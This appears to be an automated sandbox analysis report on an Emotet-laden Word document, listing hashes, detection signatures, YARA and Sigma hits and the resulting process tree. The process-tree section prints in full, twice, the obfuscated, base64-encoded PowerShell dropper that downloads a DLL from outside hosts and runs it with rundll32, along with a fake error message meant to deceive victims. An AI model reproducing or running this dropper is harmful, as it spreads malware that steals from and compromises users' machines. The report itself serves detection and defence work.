Play interactive tour

Edit tour

Analysis Report MAIL-0573188.doc

Overview

General Information

Sample Name:	MAIL-0573188.doc
Analysis ID:	337092
MD5:	7ad5e41d03b2dfe72af417fa5b0cc164
SHA1:	2a6c0fa93aba9ce560d271ce65d79db69422fc6c
SHA256:	2d6cbcbc803638a13705a3b26afb3b34b72bc58601215566ba858c62882b8e61
Most interesting Screenshot:

Detection

Emotet

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

System process connects to network (likely due to code injection or exploit)

Yara detected Emotet

Creates processes via WMI

Document contains an embedded VBA macro with suspicious strings

Document contains an embedded VBA with base64 encoded strings

Document contains an embedded VBA with many GOTO operations indicating source code obfuscation

Encrypted powershell cmdline option found

Hides that the sample has been downloaded from the Internet (zone.identifier)

Obfuscated command line found

Potential dropper URLs found in powershell memory

PowerShell case anomaly found

Sigma detected: Suspicious Encoded PowerShell Command Line

Suspicious powershell command line found

Very long command line found

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Document contains an embedded VBA macro which executes code when the document is opened / closed

Document contains embedded VBA macros

Enables debug privileges

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries the volume information (name, serial number etc) of a device

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Startup

System is w7x64

WINWORD.EXE (PID: 2364 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)

cmd.exe (PID: 2412 cmdline: cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAKwAnAC8AJwArACcAQAAnACsAKAAnAF0AYQAnACsAJwBuACcAKQArACcAdwAnACsAKAAnAFsAMwA6ACcAKwAnAC8ALwBzAGgAJwArACcAbwBwACcAKwAnAC4AJwApACsAJwBlAGwAJwArACcAZQAnACsAKAAnAG0AZQBuACcAKwAnAHMAbAAnACsAJwBpACcAKQArACgAJwBkACcAKwAnAGUALgAnACkAKwAoACcAYwBvAG0AJwArACcALwAnACkAKwAnAHcAcAAnACsAJwAtAGMAJwArACcAbwAnACsAKAAnAG4AJwArACcAdABlAG4AdAAnACkAKwAoACcALwAnACsAJwBuAC8AJwArACcAQABdAGEAbgAnACkAKwAoACcAdwBbADMAJwArACcAOgAvAC8AJwApACsAJwBrACcAKwAoACcAaAAnACsAJwBhAG4AJwApACsAKAAnAGgAJwArACcAaABvACcAKQArACgAJwBhAGgAbwAnACsAJwBtACcAKQArACgAJwBuAGEAeQAuAG4AZQAnACsAJwB0AC8AJwArACcAdwBvAHIAZABwACcAKQArACgAJwByAGUAJwArACcAcwAnACkAKwAoACcAcwAvACcAKwAnAEMAJwApACsAKAAnAEcATQBDAC8AQAAnACsAJwBdACcAKQArACcAYQBuACcAKwAnAHcAJwArACgAJwBbADMAOgAvACcAKwAnAC8AJwApACsAKAAnAGMAYQAnACsAJwBtACcAKQArACgAJwBwAHUAJwArACcAcwBlACcAKwAnAHgAcABvACcAKwAnAC4AbwByAGcALwBkAGUAJwApACsAJwBwACcAKwAoACcAYQByACcAKwAnAHQAbQBlAG4AJwApACsAJwB0ACcAKwAoACcALQAnACsAJwBvAGYALQBvAGQAaABtACcAKQArACgAJwBtAGsAZAAvADkANQBlAFgAJwArACcAWgAnACsAJwBZACcAKQArACgAJwAvAEAAXQBhAG4AdwBbACcAKwAnADMAcwA6AC8ALwBnACcAKwAnAHUAcgAnACsAJwB6AHQAYQAnACsAJwBjAC4AdwB0AGMAJwArACcAaABlACcAKQArACcAdgBhACcAKwAnAGwAJwArACcAaQBlACcAKwAnAHIAJwArACcALgBjACcAKwAnAG8AJwArACgAJwBtAC8AJwArACcAdwBwACcAKwAnAC0AYwAnACkAKwAoACcAbwBuAHQAJwArACcAZQBuAHQAJwApACsAKAAnAC8AWQB6ACcAKwAnAFoAJwApACsAKAAnADYAJwArACcAWQBaAC8AJwApACkALgAiAHIAZQBQAGAATABhAEMARQAiACgAKAAnAF0AYQAnACsAKAAnAG4AdwAnACsAJwBbADMAJwApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAHMAZAAnACwAJwBzAHcAJwApACwAKAAoACcAaAAnACsAJwB0AHQAJwApACsAJwBwACcAKQAsACcAMwBkACcAKQBbADEAXQApAC4AIgBTAFAAYABsAEkAdAAiACgAJABYADQAMQBQACAAKwAgACQATwBsADkAbwBuAGsAaQAgACsAIAAkAEYAMgAxAEQAKQA7ACQATgAzADIARQA9ACgAKAAnAFUAOAAnACsAJwA4ACcAKQArACcATgAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEkAMQA0ADUAcQBzAGwAIABpAG4AIAAkAFEAYwBlAGMAaAA0AGgAKQB7AHQAcgB5AHsAKAAuACgAJwBOAGUAdwAtACcAKwAnAE8AJwArACcAYgBqAGUAYwB0ACcAKQAgAHMAWQBzAFQAZQBtAC4ATgBlAHQALgBXAGUAQgBDAEwASQBlAE4AVAApAC4AIgBkAG8AYABXAE4AbABvAGEARABmAGAAaQBMAGUAIgAoACQASQAxADQANQBxAHMAbAAsACAAJABRADIAeQBnADkAZwBfACkAOwAkAEQAMAA4AFUAPQAoACgAJwBIACcAKwAnADQAOAAnACkAKwAnAEsAJwApADsASQBmACAAKAAoAC4AKAAnAEcAZQAnACsAJwB0AC0AJwArACcASQB0AGUAbQAnACkAIAAkAFEAMgB5AGcAOQBnAF8AKQAuACIATABFAG4AZwBgAFQAaAAiACAALQBnAGUAIAAzADAAMgA5ADkAKQAgAHsALgAoACcAcgB1ACcAKwAnAG4AZABsAGwAMwAnACsAJwAyACcAKQAgACQAUQAyAHkAZwA5AGcAXwAsACgAKAAnAEMAbwAnACsAJwBuAHQAJwApACsAKAAnAHIAbwAnACsAJwBsAF8AJwApACsAKAAnAFIAJwArACcAdQBuACcAKQArACcARAAnACsAJwBMAEwAJwApAC4AIgB0AGAATwBzAHQAcgBpAGAATgBHACIAKAApADsAJABEADYANwBIAD0AKAAnAEsAMwAnACsAJwBfAEsAJwApADsAYgByAGUAYQBrADsAJABZADUANABFAD0AKAAnAEIAJwArACgAJwA3ADYAJwArACcASwAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQARAA3ADMAVgA9ACgAJwBRACcAKwAoACcANAAnACsAJwAyAEQAJwApACkA MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)

msg.exe (PID: 2420 cmdline: msg user /v Word experienced an error trying to open the file. MD5: 2214979661E779C3E3C33D4F14E6F3AC)

powershell.exe (PID: 1976 cmdline: POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAKwAnAC8AJwArACcAQAAnACsAKAAnAF0AYQAnACsAJwBuACcAKQArACcAdwAnACsAKAAnAFsAMwA6ACcAKwAnAC8ALwBzAGgAJwArACcAbwBwACcAKwAnAC4AJwApACsAJwBlAGwAJwArACcAZQAnACsAKAAnAG0AZQBuACcAKwAnAHMAbAAnACsAJwBpACcAKQArACgAJwBkACcAKwAnAGUALgAnACkAKwAoACcAYwBvAG0AJwArACcALwAnACkAKwAnAHcAcAAnACsAJwAtAGMAJwArACcAbwAnACsAKAAnAG4AJwArACcAdABlAG4AdAAnACkAKwAoACcALwAnACsAJwBuAC8AJwArACcAQABdAGEAbgAnACkAKwAoACcAdwBbADMAJwArACcAOgAvAC8AJwApACsAJwBrACcAKwAoACcAaAAnACsAJwBhAG4AJwApACsAKAAnAGgAJwArACcAaABvACcAKQArACgAJwBhAGgAbwAnACsAJwBtACcAKQArACgAJwBuAGEAeQAuAG4AZQAnACsAJwB0AC8AJwArACcAdwBvAHIAZABwACcAKQArACgAJwByAGUAJwArACcAcwAnACkAKwAoACcAcwAvACcAKwAnAEMAJwApACsAKAAnAEcATQBDAC8AQAAnACsAJwBdACcAKQArACcAYQBuACcAKwAnAHcAJwArACgAJwBbADMAOgAvACcAKwAnAC8AJwApACsAKAAnAGMAYQAnACsAJwBtACcAKQArACgAJwBwAHUAJwArACcAcwBlACcAKwAnAHgAcABvACcAKwAnAC4AbwByAGcALwBkAGUAJwApACsAJwBwACcAKwAoACcAYQByACcAKwAnAHQAbQBlAG4AJwApACsAJwB0ACcAKwAoACcALQAnACsAJwBvAGYALQBvAGQAaABtACcAKQArACgAJwBtAGsAZAAvADkANQBlAFgAJwArACcAWgAnACsAJwBZACcAKQArACgAJwAvAEAAXQBhAG4AdwBbACcAKwAnADMAcwA6AC8ALwBnACcAKwAnAHUAcgAnACsAJwB6AHQAYQAnACsAJwBjAC4AdwB0AGMAJwArACcAaABlACcAKQArACcAdgBhACcAKwAnAGwAJwArACcAaQBlACcAKwAnAHIAJwArACcALgBjACcAKwAnAG8AJwArACgAJwBtAC8AJwArACcAdwBwACcAKwAnAC0AYwAnACkAKwAoACcAbwBuAHQAJwArACcAZQBuAHQAJwApACsAKAAnAC8AWQB6ACcAKwAnAFoAJwApACsAKAAnADYAJwArACcAWQBaAC8AJwApACkALgAiAHIAZQBQAGAATABhAEMARQAiACgAKAAnAF0AYQAnACsAKAAnAG4AdwAnACsAJwBbADMAJwApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAHMAZAAnACwAJwBzAHcAJwApACwAKAAoACcAaAAnACsAJwB0AHQAJwApACsAJwBwACcAKQAsACcAMwBkACcAKQBbADEAXQApAC4AIgBTAFAAYABsAEkAdAAiACgAJABYADQAMQBQACAAKwAgACQATwBsADkAbwBuAGsAaQAgACsAIAAkAEYAMgAxAEQAKQA7ACQATgAzADIARQA9ACgAKAAnAFUAOAAnACsAJwA4ACcAKQArACcATgAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEkAMQA0ADUAcQBzAGwAIABpAG4AIAAkAFEAYwBlAGMAaAA0AGgAKQB7AHQAcgB5AHsAKAAuACgAJwBOAGUAdwAtACcAKwAnAE8AJwArACcAYgBqAGUAYwB0ACcAKQAgAHMAWQBzAFQAZQBtAC4ATgBlAHQALgBXAGUAQgBDAEwASQBlAE4AVAApAC4AIgBkAG8AYABXAE4AbABvAGEARABmAGAAaQBMAGUAIgAoACQASQAxADQANQBxAHMAbAAsACAAJABRADIAeQBnADkAZwBfACkAOwAkAEQAMAA4AFUAPQAoACgAJwBIACcAKwAnADQAOAAnACkAKwAnAEsAJwApADsASQBmACAAKAAoAC4AKAAnAEcAZQAnACsAJwB0AC0AJwArACcASQB0AGUAbQAnACkAIAAkAFEAMgB5AGcAOQBnAF8AKQAuACIATABFAG4AZwBgAFQAaAAiACAALQBnAGUAIAAzADAAMgA5ADkAKQAgAHsALgAoACcAcgB1ACcAKwAnAG4AZABsAGwAMwAnACsAJwAyACcAKQAgACQAUQAyAHkAZwA5AGcAXwAsACgAKAAnAEMAbwAnACsAJwBuAHQAJwApACsAKAAnAHIAbwAnACsAJwBsAF8AJwApACsAKAAnAFIAJwArACcAdQBuACcAKQArACcARAAnACsAJwBMAEwAJwApAC4AIgB0AGAATwBzAHQAcgBpAGAATgBHACIAKAApADsAJABEADYANwBIAD0AKAAnAEsAMwAnACsAJwBfAEsAJwApADsAYgByAGUAYQBrADsAJABZADUANABFAD0AKAAnAEIAJwArACgAJwA3ADYAJwArACcASwAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQARAA3ADMAVgA9ACgAJwBRACcAKwAoACcANAAnACsAJwAyAEQAJwApACkA MD5: 852D67A27E454BD389FA7F02A8CBE23F)

rundll32.exe (PID: 2484 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL MD5: DD81D91FF3B0763C392422865C9AC12E)

rundll32.exe (PID: 2764 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 2812 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Shuwftk\rwhokf.exo',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 2688 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vngxkvjbqisigbn\asgkrazesikwug.frl',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 2732 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qzqgszcguiavsow\gdavyvbzxdoyhw.ift',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 2824 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gfhmd\pcib.aey',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 2456 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gwiivizeoc\rneajwbra.jdv',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 2496 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vshkfdgna\nswgiepj.iji',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)

cleanup

Malware Configuration

Threatname: Emotet

{"RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAOZ9fLJ8UrI0OZURpPsR3eijAyfPj3z6\nuS75f2igmYFW2aWgNcFIzsAYQleKzD0nlCFHOo7Zf8/4wY2UW0CJ4dJEHnE/PHlz\n6uNk3pxjm7o4eCDyiJbzf+k0Azjl0q54FQIDAQAB"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
0000000A.00000002.2105264847.00000000001F1000.00000020.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000007.00000002.2100881704.00000000001F0000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000008.00000002.2102904975.0000000000321000.00000020.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000C.00000002.2109299524.00000000001F0000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000A.00000002.2105243347.00000000001C0000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000D.00000002.2339862225.00000000001F1000.00000020.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000007.00000002.2100903607.0000000000211000.00000020.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000008.00000002.2102822583.0000000000300000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000005.00000002.2098977444.00000000003A6000.00000004.00000001.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth	0x1f10:$s1: POwersheLL
0000000C.00000002.2109419000.0000000000211000.00000020.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000B.00000002.2108184568.00000000002E1000.00000020.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000B.00000002.2107810345.0000000000240000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000D.00000002.2339841860.00000000001C0000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000005.00000002.2099018850.0000000001BC6000.00000004.00000001.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth	0x890:$s1: POwersheLL
00000009.00000002.2103779024.00000000001B0000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000009.00000002.2103864264.00000000001F1000.00000020.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
Click to see the 11 entries

Unpacked PEs

Source	Rule	Description	Author
7.2.rundll32.exe.1f0000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
13.2.rundll32.exe.1f0000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
9.2.rundll32.exe.1b0000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
9.2.rundll32.exe.1b0000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
13.2.rundll32.exe.1c0000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
7.2.rundll32.exe.210000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
10.2.rundll32.exe.1c0000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
12.2.rundll32.exe.210000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
11.2.rundll32.exe.240000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
9.2.rundll32.exe.1f0000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
10.2.rundll32.exe.1f0000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
7.2.rundll32.exe.1f0000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
11.2.rundll32.exe.240000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
11.2.rundll32.exe.2e0000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
8.2.rundll32.exe.320000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
8.2.rundll32.exe.300000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
13.2.rundll32.exe.1c0000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
12.2.rundll32.exe.1f0000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
10.2.rundll32.exe.1c0000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
12.2.rundll32.exe.1f0000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
8.2.rundll32.exe.300000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
Click to see the 16 entries

Sigma Overview

System Summary:

Sigma detected: Suspicious Encoded PowerShell Command Line

Show sources

Source: Process started

